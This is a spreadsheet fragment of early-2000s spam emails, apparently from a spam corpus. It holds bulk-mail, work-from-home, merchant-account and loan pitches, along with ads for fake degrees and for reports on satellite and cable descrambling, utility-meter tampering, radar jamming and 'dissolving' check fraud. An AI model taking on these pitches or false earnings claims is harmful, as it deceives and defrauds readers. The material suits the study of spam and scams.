    View our privacy policy.  
    Powered by--261908501.996294421526.JavaMail.RovAdmin.rovweb003--</t>
  </si>
  <si>
    <t>ARE YOU HAVING TROUBLE WITH YOUR COMPUTER?  THE PROBLEMS MAY NOT BE WITH YOUR COMPUTER?As part of a National Marketing Test, we are offering the most amazing Windows Tips. 
Over 60 ways to improve the performance of your computer. (GUARANTEED)
You will gain a better understanding of your computer and Windows 95 - 98SE operating system just by using these amazing tips and tricks.With this program and its information you will be able to: Increase your computer's resources (Are you at 96%?)
Search for hidden files
Keyboard Shortcuts
Restart your computer faster
Open programs faster
Find better ways to free up memory
New PnP devices
Find the hidden settings for Windows
How to make a Restart Icon
What to do when Windows won't start?
Memory issues
INI versus registry
Changing Logon and Logoff screens
Did you know you could change the name of your "Start" menu?THIS IS ONLY A SAMPLE OF WHAT IS AVAILABLE TO YOU WITH THIS PROGRAM.During this special promotion we will be offering this amazing program for just $14.95 postage paid. This is less than half of the suggested retail price of $29.99All you will need to run this disk is a Windows based computer and an Internet browser (no need to be connected to the Internet). Sorry no Macintosh version available at this time.These are tips and tricks that computer technicians know and now you have all the information available for a low price of only $14.95 postage paid! Software and computer manufacturers don't want you to know these secrets, because they want you to buy their software and/or technology upgrades at very inflated prices.
This investment of only $14.95 truly outweighs the frustration of a poorly working good computer.Gain a better understanding of your computer by using these tips.ORDER TODAY FOR YOUR COPY OF THIS AMAZING PROGRAM FOR WINDOWS.Postage paid.
$14.95 US, $19.95 International (U.S dollars)(We accept Cash, Check or Money order)Make Checks payable to:
C Chute
PO Box 6337
Jacksonville, Fl. 32205-9998Please Print Clearly Your Return:Name  _______________________________________________________________l31__Address _______________________________________________________________       City, State, and Zip Code _____________________________________________E-mail Address_________________________________________________________   ........................................................................This program is fully guaranteed. If you are unhappy just return the disk within 30 days
And we will refund your money.Copyright 2001
C Chute
All Rights ReservedAll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2getoffmylist@start.com.au   and place remove in the subject.Thank you:
PLEASE FORWARD TO EVERYONE YOU KNOW!
ONE DAY THEY WILL THANK YOU!
This mailing is done by an independent marketing co.
We apologize if this message has reached you in error.
Save the Planet, Save the Trees!  Advertise With
E-mail.  No wasted paper!   Delete with 
One simple keystroke!  Less refuse in our Dumps!Make it a great day!------------------------------------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">HELLO: THIS IS AN ADVERTISEMENT FOR THE PUBLISHERS
CD-ROM, IF YOU HAVE NO INTEREST IN THIS INFORMATION, 
PLEASE CLICK DELETE. THANK YOU.This exciting opportunity requires a very LOW START-UP COST 
and has already been TESTED AND PROVEN.  
We are in the information age, billions are made every year in the
information industry and you can take part in making money by
selling information.  We have available on CD-ROM 2000 
HOW-TO BOOKS, REPORTS, AND MANUALS.
The CD-ROM contains such categories as business, finance,
government, health, mail order and much more.
Some of the title's on the CD-ROM are.....
how to make profits with 800#s, how to use the internet to make
profits,how to beat depression, how to live a longer and healthier life,
how to advertise,how to prepare a business plan, how to get a
credit card, how to find work with the federal government, 
how to write a winning resume, how to start a daycare,
how to  raise money for your business, and much much more.The CD-ROM contains single page reports, 40 page manuals
and 200 page books. You own the REPRINT, RESELL RIGHTS
with the purchase of the CD-ROM. Not only can you use this
wealth of information for your own benefit, you can also
market this information to others. You can PRODUCE FOR
PENNIES AND SELL FOR BIG DOLLARS.Remember this is an already
TESTED AND PROVEN successful business opportunity!
 ACT NOW!!  REGULAR PRICE $59.95
ORDER BEFORE AUG 12 AND RECEIVE FOR THE
BONUS PRICE OF $15.95.Simply send $15.95 check, money order, or
credit card information to:
MARKETING RESOURCES
PMB 179
1812  S. HWY 77 # 115
LYNN HAVEN, FL 32444 CREDIT CARD ORDERS, please mail in your information.
Attention Marketing Resources, here is credit card
information for the amount of $15.95 for the Publishers CD-ROM.ACCOUNT NUMBER________________________________
EXP. DATE________________________
NAME___________________________
BILLING ADDRESS________________________________
CITY_________________________STATE____________ZIP__________
HOME PHONE NUMBER_____________________________ff we have reached you in error, and you would like to be removed
stiylack@yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
We provide businesses of ALL types an opportunity to have their own
no hassle Credit Card Merchant Account with NO setup fees. Good
credit, bad credit, no credit -- not a problem! 95% approval rate!You will be able to accept all major credit cards including Visa,
MasterCard, American Express and Discover, as well as debit cards,
ATM and check guarantee services. You will have the ability to
accept E-checks over the Internet with a secure server. To insure
that you wont miss a sale, you will be able to accept checks by
Phone or Fax. We can handle ANY business and client type!If you already have a merchant account we can lower your rates
substantially with the most competitive rates in the industry and
state of the art equipment and software. We will tailor a program
to fit your budget and you wont pay a premium for this incredible
service!If you are a U.S. or Canadian citizen and are interested in finding
out additional information or to speak with one of our reps, reply
to this email and include the following contact information: Your
Name, Phone Number (with Area/Country code), and if possible, a
best time to call. One of our sales reps will get back to you
shortly. Thank you for your time.If you wish to be removed from our mailing list, please reply to
this email with the subject "Remove" and you will not receive
future emails from our company.</t>
  </si>
  <si>
    <t xml:space="preserve">
Increase your revenues  by accepting Credit Cards and Checks!Visa ~ MasterCard ~ American Express   ~ Check Guarantee   ~ Electronic Internet checksIncrease Sales w/4 Powerful Words !!!
We Accept Credit CardsToday,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items.Complete E-COMMERCE solutions to accept VISA, MasterCard, American Express and Checks for your website, online store, traditional storefront or home based business.for more information please visit our FAQ
http://members.tripod.co.uk/hhs888
========================
Or Submit Your Information Via Email
NAME:
PHONENUMBER:
AND BEST TIME TO CALL:
========================Thank you To be removed type remove in the subject line
</t>
  </si>
  <si>
    <t xml:space="preserve">
Increase your revenues  by accepting Credit Cards and Checks!Visa ~ MasterCard ~ American Express   ~ Check Guarantee   ~ Electronic Internet checksIncrease Sales w/4 Powerful Words !!!
We Accept Credit CardsToday,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items.Complete E-COMMERCE solutions to accept VISA, MasterCard, American Express and Checks for your website, online store, traditional storefront or home based business.for more information please visit our FAQ
http://medlem.tripodnet.nu/jja8888
========================
Or Submit Your Information Via Email
NAME:
PHONENUMBER:
AND BEST TIME TO CALL:
========================Thank you To be removed type remove in the subject line
</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Consumers, Increase your Business Sales! How?? By 
targeting millions of buyers via e-mail !! 
15 MILLION EMAILS + Bulk Mailing Software For Only $100.00
super low price! ACT NOW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others?Free Classifieds? (Don't work)
Web Site? (Takes thousands of visitors)
Banners? (Expensive and iffy)
E-Zine? (They better have a huge list)
Search Engines? (Easily buried with thousands of others)Bulk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INFORMATION:Send check are money order to:SELLERS COMMUNICATIONS
2714 WEST 5th
North Platte, Ne 69101
U.S.A.
CHECK BY FAX SERVICES OR CREDIT CARO INFO: 
O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
is received before 3pm Central . To place an order, you can call us at: 
1-308-534-2098 Are fax your order to 1-208-975-0773 are 1-208-975-0774
This Number is for credit Card Orders Only!!!
CHECK BY FAX SERVICES!
__________________________________________To order, via credit card simply cut/paste and print out the
EZ ORDER FORM below and fax to our office today.
***** NOW ONLY $100! *****This "Special Price" is in effect for the next seven days,
after that we go back to our regular price of $250.00 ...
Don't delay... you can be in business tomorrow! We accept Visa, Mastercard, Amex, Disc and Checks by Fax.----------------------Cut &amp; Paste----------------------
---------------------EZ Order Form---------------------_____Yes! I want everything! I am ordering within 72 hours.
Include my FREE "Business On A Disk" bonus along with your 
Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)
for the special price of only $100.00 + shipping as indicated
below._____Yes! I missed the 72 hour special, but I am ordering
CD WITH, super clean e-mail addresses within 7 days for the
"special" price of only $250.00 + s&amp;h._____Oop's I missed the 72 hour and 7 day "specials". I am
ordering The Cd at the regular price of $250.00 + s&amp;h.***PLEASE SELECT YOUR SHIPPING OPTION***____I would like to receive my package FedEx OVERNIGHT. I am
including $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,
all other International add an *additional* $25 [$40 total] for shipping)____I would like to receive my package FedEx 2 DAY delivery.
I'm including $10 for shipping. (Sorry no Canada or International
delivery - Continental U.S. shipping addresses only)***Please Print Carefully***NOTE: Orders cannot be shipped without complete information
including your signature. No exceptions!NAME____________________________________________________COMPANY NAME____________________________________________ADDRESS_________________________________________________
(FedEx can only ship to street addresses - no P.O. boxes)CITY, STATE, ZIP________________________________________PHONE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
is received before 3pm Central . To place an order, you can call us at: 
1-308-534-2098 Are fax your order to 1-208-975-0773 are 208-975-0774
This Number is for credit Card Orders Only!!!
CHECK BY FAX SERVICES!If you would like to fax a check, paste your check below and fax it to our office 
along with the EZ Order Form forms to: 1-208-975-0773 are 208-975-0774*************************************************************24 HOUR FAX SERVICES*** PLEASE PASTE YOURCHECK HERE AND FAX IT TO US AT 1-208-975-0774
are 208-975-0773**********************************************************If You fax a check, there is no need for you to mail the
original. We will draft a new check, with the exact
information from your original check. All checks will be
held for bank clearance. (7-10 days) Make payable to: 
"SELLERS COMMUNICATIONS"
-=-=-=-=--=-=-=-=-=-=-=Remove Instructions=-=-=-=-=-=-=-=-=-=-=-=**************************************************************
Do not reply to this message - 
To be removed from future mailings:
mailto:nonono122002@yahoo.com?Subject=Remove
**************************************************************</t>
  </si>
  <si>
    <t xml:space="preserve">
Are your tired of 9 to 5? 
Let us show you how to be successful from your home...We are living in the most prosperous time in 
history. Now is your turn to profit. Learn to 
earn 6 Figures from home. It is easier than ever!Plus, receive your FREE GIFT &amp; FREE Info when
visiting our web site.CLICK HERE!
You were sent this message because your address is in our subscriber database. 
If you wish to be removed, please click here and we will remove you from our subscriber list.ss1
</t>
  </si>
  <si>
    <t xml:space="preserve">
Educate yourself about everything you ever wanted to know !!! 1. Satellite TV/RCA Dish DescramblerOur unique, complete plans for building your own home satellite TV descrambler. For access to a clear reception of pay TV signals on your home satellite dish! It does not require any additional equipment! Complete PC board template &amp; instructions! This also includes a manual for accessing the RCA/DSS satellite dish to receive free pay channels. All the latest information for doing it right. 2. X-Ray Envelope SprayHave you ever wanted to read the contents of an envelope without opening it? Many government and other organizations use what is known as X-Ray Envelope Spray to do this! An envelope is sprayed with this secret chemical and it becomes translucent for a short period of time, which allows the contents to be read without opening. Private supply houses sell small cans of this aerosol spray for up to $50 a can! The spray is actually a commonly available item found in major grocery and discount stores. No modification of the spray is needed, as it is ready to use as X-Ray Envelope Spray and sells for about $1.99 in retail stores!3. How to Find Anyone and Obtain Unlisted Phone NumbersTired of getting the wrong number? Stop looking! We can help! We'll show you how to get the unlisted phone number of anyone. No one can hide now! Simple. Skip tracers use these tricks. We also include everything you need to know about finding missing people or loved ones from the comfort of your home. Why pay money when you can do it yourself? 4. Radar Zapper This simply technique converts existing radar detectors into a device that will jam police radar. This device sends false readings back to the police radar! Works on virtually all detectors and easy to use!5. Untraceable E-Mail How to send totally anonymous and untraceable E-mail. We're not talking about those generic Yahoo! Accounts -- this is the real McCoy, anonymous email. Everything explained. Absolutely untraceable.6. Underground Guide to Utility MetersThe illustrated guide to gas, water &amp; electric meters! We show you in detail methods many people use to stop, slow down, even reverse all three types! This underground manual is one of our most popular items! Complete illustrated techniques and easy to do. Shows how to defeat all major brands &amp; models of gas, water &amp; electric meters.7. Scan-Tron GeniusHere at last!! This very controversial report describes in detail how any student can easily defeat Scan-Tron test readers to pass a test even though he does not know the answer! This simple method will fool the scan reader into thinking you answered correctly! No tools needed. Completely tested. You won't believe how simple this method is!8. Bad Credit Cleaning ManualSimple ways to restore your bad credit rating to A++. Don't pay a credit counselor good money to do what you can do yourself. Many methods presented here - some legal &amp; some "not so legal". Wipe your slate clean from your own home. Get a fresh start.9. Pass Drug Tests Don't use of drugs! However, many innocent people are victims of drug testing. Some over the counter medicine can trigger false results &amp; cost you your job. Proven methods to beat drug tests. We show you how to build a simple device that can fool the best! Protect yourself &amp; your job, even if you don't use drugs.10.Cable TV DecodersHow to get cable TV and turn your converter box into "full service" mode. This is the latest and best way to gain access. Also, how to build your own "snooper stopper" for pennies. Prevents cable companies from spying on you.11. Free Long DistanceYou can make long distance calls to other countries at no cost! The information in these reports explains everything you need to call other countries! Country codes, city codes, overseas sender codes! Call England, Germany, the UK, practically anywhere!12. Dissolving ChecksWe show you in detail the "insufficient funds" checks scam used by people to obtain goods &amp; cash without having any money in the account. Many people do not even use false ID's in pulling this scam off. Complete detailed instructions plus rare information on the famous "dissolving" checks. These checks "dissolve" after being chemically coated &amp; deposited in the bank leaving no trace of the writer or account number. Not for illegal purposes. See how others do it. 13. Outsmart Lie Detector TestsHundreds of thousands of people in this country are wrongfully fired or not hired simply because they did not pass the lie detector test even though they've done nothing wrong! Read drugless methods to help pass whether you are lying or not! A valuable tool for any job seeker. Don't be harassed by your employer ever again. Tested and proven.14. Lock-picks &amp; Lock-picking. Why buy expensive lock-picks &amp; pay for rip-off mail order locksmith courses? We'll show you how to make your own professional lock-picks. Exact detailed drawings &amp; construction techniques! This is perhaps the easiest to understand course ever published on this hush-hush subject. You won't believe how easy it is to make these tools! We also show you how a basic lock works &amp; how they are picked. This publication is complete with detailed drawings &amp; illustrations.15. Guaranteed Unsecured Credit Cards up to $50,000 Regardless of Bad Credit.We can show you how and where you can obtain unsecured Gold and Platinum credit cards with credits limits up to $50,000 per card!  Regardless of your past credit history! You are guaranteed to receive at least 2 unsecured credit cards of up to $20,000 through our exclusive list. The secret to getting the credit you deserve is knowing how and where to look!* No credit checks! No employment check!
* No credit turndowns! No credit, Bad credit! 
* Some with as low as 0% APR for the life of the card!
* Guaranteed approval! 
ALL IN ONE!!! PREVIOUSLY SOLD FOR HUNDREDS!!! ORDER NOW!!!That's 15 products, all for just $19.95 [shipping &amp; handling included].We accept cash, personal checks, money orders and cashiers checks. You must include a Primary and secondary E-mail address, as we will be emailing you all the reports as soon as your payment is received.Print the following form &amp; mail it to:Info 4 Edu Only
1300 N. Cahuenga Blvd # 362
Los Angeles, CA 90028
Please Print ClearlyName: _________________________________________________Primary Email Address: ___________________________________Secondary Email Address: _________________________________Make your check payable to: Info 4 Edu OnlyDISCLAIMER: Please note that this information is being provided for educational purposes only. The information itself is legal, while the usage of such information may be illegal. We do not advocate unauthorized use or theft of any services. If in doubt, check your local laws and act accordingly. 
NOTE: All of the publications are Copyright 2001 by Info 4 Edu Only. We aggressively protect our copyrights and will seek prosecution of any website, web-master, web hosting service or anyone else that is in violation of US &amp; International Copyright Laws. To be opt out from our future mailing please email optmeoutnow@aol.com with the word remove in the subject line</t>
  </si>
  <si>
    <t xml:space="preserve">
DID YOU MAKE $5,000 LAST MONTH? IF NOT, 
           YOU NEED TO JOIN US TODAY! ========================================= This is the REAL DEAL!!  Do not delete!  Read 
entire message. This is NOT "pie in the sky"!! This 
is NOT MLM!!  It's better than MLM!!  This is a 
REAL legitimate business with REAL legitimate 
products,  REAL legitimate income and HUGE residuals. ========================================= 
Market the hottest consumer savings package in 
America today and earn up to $1,000 each and 
every time someone joins for $0 DOWN! 
Imagine being plugged into a proven system 
that puts your entire business on auto-pilot and 
have you earning $3,000 every week! 
  IT'S TRUE! You can be in business for $0 DOWN! 
And you can easily make $3,000 your very first week... 
and we'll show you how! Your business will literally 
explode overnight when you join our team and plug 
into our exclusive marketing system! 
  For more INFO send an e-mail to: mailto:tim1me2@n2mail.com
with  in the subject line. 
      *  $0 DOWN !     * 100% FINANCING - 100% CASH MACHINE     * EVERYBODY IS A PROSPECT - 98% APPROVED     * EARN $1,000 ON EVERY A THROUGH F CREDIT SALE!     * EARN $1,000 ON EACH AND EVERY SALE TO INFINITY! 
  We provide you with all the tools and the absolute 
BEST marketing system available on the web, 
all resources you will every need - even full tech support!. The only thing you need to do is join our team and plug 
into our proven system for success today! For more INFO send an e-mail to: mailto:tim1me2@n2mail.com 
with  in the subject line. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Testimonies: This program is so easy, 'with your system I have 
made 13 sales first week'. That's $13000' this 
is the best program I've done and I've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&amp; pay for faxes that got my phone ringing off the 
hook! I think I'll have 20 sales this month!!! 
I haven't even begun to download all the free 
software to make even more MONEY' Thanks guys Randy S. Detroit MI 
I was in my chiropractor's office when the secretary 
was about to throw out a fax that they had just received. 
The fax was similar to this email and caught my eye. 
I did exactly what it told me to do (a fax blast) and 
in my second day I made $6,000. No hard selling, no 
hustling my friends, just friendly people looking at 
a great opportunity and wanting in. Even if it took 
me a month to make an extra $5,000 I would have been 
happy, but $6,000 in my second day, wow! I'm excited. Dave W. Newport Beach, CA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If you have been looking for something that is NOT MLM, 
is turnkey and very easy to do, then join us now, 
This is a truly explosive income opportunity! Sign up 3 people 
&amp; earn $3,000! Sign up 10 people &amp; earn $10,000...how much 
do you want? This is the easiest sale you will EVER make! GET STARTED WITH INCREDIBLE $0 DOWN + START EARNING $1,000  COMMISSIONS,  YOUR FIRST MONTH! All sales wired into your checking account on a daily basis! Best Regards,
RobertPS: Just put "Remove" in the subject box, to unsubscribe from
this list.  Thanks.
 </t>
  </si>
  <si>
    <t>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graduate's permanent record with our colleges. Degree verification and official transcripts will be provided in writing when requested by employers and others authorized by the graduate.Our College and University transcripts meet the highest academic standards. Our University issues a degree printed on a premium diploma paper, bearing the official gold raised college seal.Your degree is closer than you think.
No one is turned down.Confidentiality is assured, and we are awaiting your call today!CALL 1 713 866-6501Call 24 hours a day, 7 days a week, including
Sundays and holidays.If you can't call - we can't help you.If your phone is currently tied up, please print this page now!  This advertisement is done by an independent marketing company, so please do not hit reply to the e-mail message.If you would like to be  removed from our great mailing list:removemenow@sohu.comand type your e-mail address ONLY  in the subject line.</t>
  </si>
  <si>
    <t xml:space="preserve">
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delay.Also, as our client we can offer you other services and help with
other problems such as:- Tax Preparation
- Audits
- Seizures
- Bank Levies
- Asset Protection
- Audit Reconsideration
- Trust Fund Penalty Defense
- Penalty Appeals
- Penalty Abatement
- Wage Garnishments
.. and more!To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days.**********Full Name: 
State: 
Phone Number: 
Time to Call: 
Estimated Tax Debt Size: **********Thank you for your time.Note: If you wish to receive no further advertisements regarding
this matter or any other, please reply to this e-mail with the
word REMOVE in the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">
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address!For Opt-in sales call Daniel: 1-949-453-8353CHOOSE YOUR CATEGORY.
Categories:
Automotive	
Business	
Careers	
Computer
Hardware
Computer Software	
Cooking, Food &amp; Wine	
Education	
Electronics
Entertainment	
Family	
Fine Arts	
Games/Sweeps
Government	
Health	
Home &amp; Garden	
Internet
Music	
News
Pets	
Real Estate	
Shopping		
Beauty
Toys	
Books	    
Golf	
Gambling
Politics	
Auctions    
Electronics
Investing &amp; Finance
Manufacturing	
Sports &amp; Recreation
Travel &amp; Leisure
Religion 
Science &amp; Technology
AND MUCH MORE!For Opt-in sales call Daniel at 1-949-453-8353
Try a 5,000 opt-in e-mail for Only $325.00 and start getting sales!
*************************************************************************************
Start getting the exposure your website needs and the buzz it deserves.
**************************************************************************************SPECIAL ORDER OPT-IN LIST NOW AVAILABLE*AD EXECUTIVES 
PROFILE:
Reach 100% Opt-in email advertising executives and sales management decision makers.  
These are the web's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more.DEMOGRAPHICS/E-PROFILE
These are highly educated, sales &amp; marketing oriented executives, some holding titles of CMO, 
VP Marketing, VP Sales, VP Sales &amp; Marketing, Marketing Manager, Sales Manager, Media Manager, 
Account Supervisor, and others. CURRENT LIST USAGE: New to Market
CURRENT LIST COUNT: 16,000+
PRICE: $4,000
COMMENTS: Very powerful and Effective!!
CALL TO ORDER: 1-402-597-4111If you would like us to build a "Custom" Opt-in subscriber list for 
you, Call Mike at 1-402-597-4111Are you currently Marketing on the Internet? Give us a call. 
We have low cost tools to help you succeed.Would you like instant traffic? We can redirect traffic from our Search 
Engines to your WebSite instantly! Skip the hard to get ranked within 
a search engine game.Here's a deal!  Get 1,000,000 banner impressions for ONLY $1,500.
Full stat page for tracking. Call Mike at 1-402-597-4111Opt-in List Owners and Brokers Welcome. NO LIST TO SMALL.Opt-out -    Media2001USA@yahoo.com    Please put your email address within the subject line.
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address!For Opt-in sales call Daniel: 1-949-453-8353
</t>
  </si>
  <si>
    <t xml:space="preserve">
HOW TO SUBSTANTIALLY INCREASE SALES:Easily accept major credit cards right away!===========================================
Submit the following via email to receive more information.
Or vist our online submition
http://utenti.tripod.it/aha7666
NAME:
PHONENUMBER:
AND BEST TIME TO CALL:
===========================================Merchant Status will help you increase sales by an
incredible 50% to 100%. Stop losing valuable sales!With one phone call you can be:Accepting all major credit cards!
Accepting checks over the net or by Fax!
Accepting real time processing for member sites!
Gaining custumer loyalty and trust!Close the sale now. No more wondering if "The check
is in the mail"We specialize in helping businesses who
are just starting out with no credit, poor credit, or
even if you have great credit.Almost everyone is approved!===========================================
Submit the following via email to receive more information.
NAME:
PHONENUMBER:
AND BEST TIME TO CALL:
===========================================To be taken off the list type remove in the subject line.</t>
  </si>
  <si>
    <t xml:space="preserve">
HOW TO SUBSTANTIALLY INCREASE SALES:Easily accept major credit cards right away!===========================================
Submit the following via email to receive more information.
Or vist our online submition
http://usuarios.tripod.es/aj222
NAME:
PHONENUMBER:
AND BEST TIME TO CALL:
===========================================Merchant Status will help you increase sales by an
incredible 50% to 100%. Stop losing valuable sales!With one phone call you can be:Accepting all major credit cards!
Accepting checks over the net or by Fax!
Accepting real time processing for member sites!
Gaining custumer loyalty and trust!Close the sale now. No more wondering if "The check
is in the mail"We specialize in helping businesses who
are just starting out with no credit, poor credit, or
even if you have great credit.Almost everyone is approved!===========================================
Submit the following via email to receive more information.
NAME:
PHONENUMBER:
AND BEST TIME TO CALL:
===========================================To be taken off the list type remove in the subject line.</t>
  </si>
  <si>
    <t xml:space="preserve">
You have been specially selected to qualify for the following:Premium Vacation Package and Pentium PC Giveaway
To review the details of the please click on the link 
with the confirmation number below:http://www.1chn.net/wintripConfirmation Number#Lh340
Please confirm your entry within 24 hours of receipt of this confirmation.Wishing you a fun filled vacation!
If you should have any additional questions or cann't connect to the site 
do not hesitate to contact me direct:
mailto:vacation@btamail.net.cn?subject=Help!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi jm@netnoteinc.com,Are you ready to hear the cold hard facts about
internet marketing?http://BulletProofMarketing.Does.ItThe TRUTH is sometimes hard to swallow
and is in VERY short supply on the internet!Now you can put this to an end and RETIRE in 6 months!* Want to make $5,000/mo. within 60 days using proven 
   methods that work? NO BULL!
* Tired of KILLING yourself promoting programs that pay 
   just once?
* Want to make MORE and MORE while you do LESS and LESS?
* Want to live worry free while THOUSANDS of other people 
   build YOUR business?
* Want to send out 20,000 TARGETED up-to-date emails DAILY?Click here when you're ready for some real money! http://BulletProofMarketing.Does.ItDon't be left behind... ACT NOW!Sincerely, NetProMarketing
Direct Consulting for the home-biz entrepreneurial type.AOL Members Click 
Here
_________________________________________________Disclaimer
=======
Thanks for reading this review - it'll be beneficial to your 
online marketing efforts! 
Anyways, should you, jm@netnoteinc.com, 
have received this message by mistake, just hit 'Reply' 
and put 'REMOVE' in the subject line.Enjoy your prosperity !
_________________________________________________
</t>
  </si>
  <si>
    <t xml:space="preserve">
 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
</t>
  </si>
  <si>
    <t xml:space="preserve">
We are Trans World Funding, providing immediate CASH for your business and personal needs.Visit us at http://www.tfund2000.,comWe pay cash for military, government or VA pensions.
We provide a health plan, including  dental, vision care, prescription drugs and chiropractic service.
Lack of working capital?  We can bring in cash...now.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at:http://www.tfund2000.comTo be removed from our mailinf list send a blank email with the word remove in the subject line.
Thank you and have a great day!
</t>
  </si>
  <si>
    <t xml:space="preserve">
Free sports, Free xxx Movies, Free Pay perview.
Get All Satellite Channels Free !!Now your can program your satellite system to get all
channels free. This include Direct Tv, Dishnetwork 
and Gla. Our satellite programming packages comes with
everything your need to program your satellite system.
The software is ease as 1,2,3 to use and it takes less
that 5 minute to program your satellite system. There 
are company that will charge you up to $600 to do this
for you and everytime your card needs to be reset they 
charge you an extra $100.00 Now you can do it yourself for :
Only $99.00
Email us 
for order information.</t>
  </si>
  <si>
    <t xml:space="preserve">
New Page 1Take Control of Your Life Today
and Make the Money that you Deserve!Â Welcome to the last stop in your search for a true and total Money Making Opportunity. We have
studied Marketing for years and have finally come to where we are able to deliver to you the most complete package available today!Â If you are looking for unlimited income
potential then this is the chance for you. THIS IS A REAL BUSINESS, not Multi-Level-Marketing, Network Marketing or any other type of business that you have seen in the past. It is a complete state of the art system that comes complete with everything that you need to succeed. Â Â FIND OUT HOW TO CAPTURE THE MOST EXCITING OPPORTUNITY IN YEARS!Â CLICK HEREÂ Â Â 
AUTOMATED
REMOVAL INSTRUCTIONSThis
message is intended for individuals who have an interest in financial and money matters.Â  If this message has reached you in error, and you want to be removed from our mail agents database, CLICK HERE and TYPE YOUR EMAIL ADDRESS IN THE SUBJECT HEADER.Â  Your address will be automatically removed from our mail agents master database.
Thanks for your time :)
</t>
  </si>
  <si>
    <t xml:space="preserve">
We are Loan Specialists
Free Service to
Homeowners!Â 
Home Loans Available For Any Situation.Â Whether
your credit rating is A++ or you are "credit challenged",
we have many loan programs through hundreds of lenders.Â 
Second Mortgages - We can help you get up to 125% of your
homes value (ratios vary by state).Â 
Refinancing - Reduce your monthly payments and get
cash back.
Debt
Consolidation - Combine all your bills into one,
and save money every month.Â 
CLICK 
HERE For All Details And A Free Loan Quotation 
Today!We strongly oppose the 
use of SPAM email and do not want anyone who does not wish to receive 
ourÂ mailings to receive them. As a result, we have retained the 
services of an independent 3rd party toÂ administer our list management 
and remove list (http://www.removeyou.com/). This is not 
SPAM. If youÂ do not wish to receive further mailings, please click 
below and enter your email at the bottomÂ of the page. You may then 
rest-assured that you will never receive another email from usÂ again. 
http://www.removeyou.com/ The 21st 
Century Solution. I.D. # 023154
</t>
  </si>
  <si>
    <t xml:space="preserve">
For a limited time, you can get a beautuful, 100% custom website (or yours redesigned) for $399 complete when you host with us for only @19.95/month. (100 megs, 20  Email POP accounts and more). Includes up to 6 pages (you can add more), feedback forms, more.We have plenty of references cost to coast.  Call 800-215-4490 (24 hours) for details and site addresses to see our beautiful custom work.To be removed from our list, Click here:  xxz7rem@mail.com?subject=Remove81TH
</t>
  </si>
  <si>
    <t xml:space="preserve">
Are you in debt for $4,000 or more?Are you tired of being overwhelmed by your bills?Feeling as if is there nothing you can do about it?Do you have too many credit cards?We can help you get out of debt without another loan!
We make Debt a thing of the Past!
We offer hope and help to put you back on track with your finances!
We are here to help!You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sources)To no longer receive this message reply with the word - remove - in the e-mail subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Recruiting all those wanting a career in entertainment!!
(acting, dancing, singing and modeling).World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 New and fresh looks
with little to no experience...... WE SPECIALIZE IN THIS!The following list represents some of the jobs we have helped
place our clients in:TV and Cinema:The Practice
Blow
Friends
Frazier
ER
Nash Bridges
Legally Blonde
Traffic
TV Commercials:Budweiser
Coca Cola
Mitsubishi
Castrol Oil 
AT&amp;T
Ford
Print advertisements:    Polo
Tommy Hilfiger
Gap
Ballys
Guess
Nautica
Victoria's Secret
Este Lauder
Bebe
Music Videos:Limp Bizcut
Janet Jackson
Brittany Spears
Metallica
Jessica SimpsonAnd hundreds more....
Your one time investment of only $19.95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hired.WE DO NOT MAKE MONEY UNLESS YOU DO!!
What we need from you is:
1. Headshot (full body shot optional)
2. Your resume and or a brief story of yourself (bio). 
   Rest assured there is no entertainment experience necessary. 
   Just the desire to be in the entertainment industry.
3. Your complete mailing address, telephone number, e-mail and
   all other contact information you can give us.
4. A check or money order for $19.95 payable to:
   World Star Talent Agency Inc.
5. Put all of the above in an envelope and mail to:World Star Talent Agency Inc.
8491 Sunset Blvd. Suite 175
Hollywood, CA 90069
Why put it off today when you will be on your way to being a STAR tomorrow?Please no videos at this time.</t>
  </si>
  <si>
    <t xml:space="preserve">
TO BE REMOVED FROM FUTURE MAILINGS, SIMPLY REPLY TO
 THIS MESSAGE AND PUT "REMOVE" IN THE SUBJECT.
    99  MILLION
EMAIL ADDRESSES
  FOR ONLY $99
OR BETTER YET... DOUBLE THAT COUNT...
   200  MILLION
EMAIL ADDRESSES
  FOR ONLY $149 
  You want to make some money? 
  I can put you in touch with over 200 million people at virtually no cost.
  Can you make one cent from each of theses names?
If you can you have a profit of over $2,000,000.00   That's right, I have over 200 Million  Fresh  email 
addresses that I will sell for only $149. These are all 
fresh addresses that include almost every person 
on the Internet today, with no duplications. They are 
all sorted and ready to be mailed.  That is the best 
deal anywhere today!  Imagine selling a product for 
only $5 and getting only a 1% response.   That's  OVER
$10,000,000 IN YOUR POCKET !!! 
  Don't believe it? People are making that kind of 
money right now by doing the same thing, that is 
why you get so much email from people selling you 
their product....it works!  I will even tell you how to 
mail them with easy to follow step-by-step 
instructions I include with every order. 
I will send you a copy of every law concerning 
email. It is easy to obey the law and make a 
fortune. These 200 Million email addresses are     
yours to keep, so you can use them over and 
over. They come on a collection of several CDs.  
  This offer is not for everyone. If you can not 
see the just how excellent the risk / reward ratio 
in this offer is then there is nothing I can do 
for you.  To make money you must stop dreaming 
and TAKE ACTION.
SIX PACKAGES -   ECONOMY   (99 Million Addresses -
                                                            Addresses ONLY)
                                   ECONOMY  PLUS SPECIAL                                                            (99 Million Addresses -
                                                            AND a MASS MAILING PROGRAM)                                   BRONZE         (200 Million Addresses -
                                                          Addresses ONLY)                                   SILVER            (mailing software included)                                   GOLD             ( everything to make the Internet
                                                          your personal bank account)                                   PLATINUM    ( personal  UNLIMITED LIVE TECH 
                                                          support by phone - whenever you
                                                          need it***)                                 *** These programs are VERY EASY to use.
                                      Some people who are brand new to mailing
                                      like the confidence of LIVE TECH SUPPORT.
                                      It is not needed if you have basic computer skills 
                                                            PACKAGE DESCRIPTIONS BELOW;****************************************
THE ECONOMY MARKETING SETUP  (99,000,000 addresses ONLY)
99,000,000 email addresses on CD
These name are all in text files
ready to mail!!!
$99.00
If you need HIGH SPEED mailing software keep reading below.  
SEVERAL WAYS TO ORDER !!!
